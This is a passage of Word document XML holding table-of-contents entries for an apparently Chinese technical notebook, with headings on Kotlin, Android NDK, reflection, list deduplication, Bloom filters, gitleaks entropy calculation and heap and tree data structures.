        <w:p w14:paraId="404E3628" w14:textId="4A61258D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780180" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kotlin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780180 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>838</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="138071F4" w14:textId="424ECA60" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780181" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Android</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780181 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>838</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41A053D0" w14:textId="7ACD1132" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780182" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780182 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EBC38EA" w14:textId="3FEF107A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780183" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NDK</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780183 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55E0477E" w14:textId="16F6B783" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780184" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>算法及其他常识</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780184 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1823887D" w14:textId="6D94635F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780185" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>编程语言中的反射是什么意思</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780185 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2637E37A" w14:textId="32B61DEE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780186" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>whileTrue</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的危害以及避免进入短期的循环语句</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780186 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>839</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="491E7E69" w14:textId="3B401D33" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780187" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>列表去重</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780187 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>840</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31E459BD" w14:textId="10398C01" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780188" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>去重，顺序乱掉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780188 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>840</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2053681A" w14:textId="00116612" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780189" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>去重，但是还还原</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的顺序</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780189 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>841</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ACD6904" w14:textId="2904B27A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780190" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>布隆过滤器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780190 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>841</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75428170" w14:textId="0F8871E0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780191" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pybloom_live</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780191 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>842</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="136C8E5E" w14:textId="3813D911" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780192" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gitleaks</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>熵值计算优化：香浓熵计算</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780192 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>843</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="469E562F" w14:textId="67B6BE32" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780193" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Golang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780193 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>844</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="435D1F18" w14:textId="55C20BD5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780194" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>猜词</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780194 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>844</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="667EA346" w14:textId="424497AB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780195" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>堆的数据结构</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780195 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>844</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="234AA02E" w14:textId="00AE02EF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780196" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>二叉树</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780196 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>844</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00EFBFD5" w14:textId="1A93209A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780197" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>堆</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780197 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
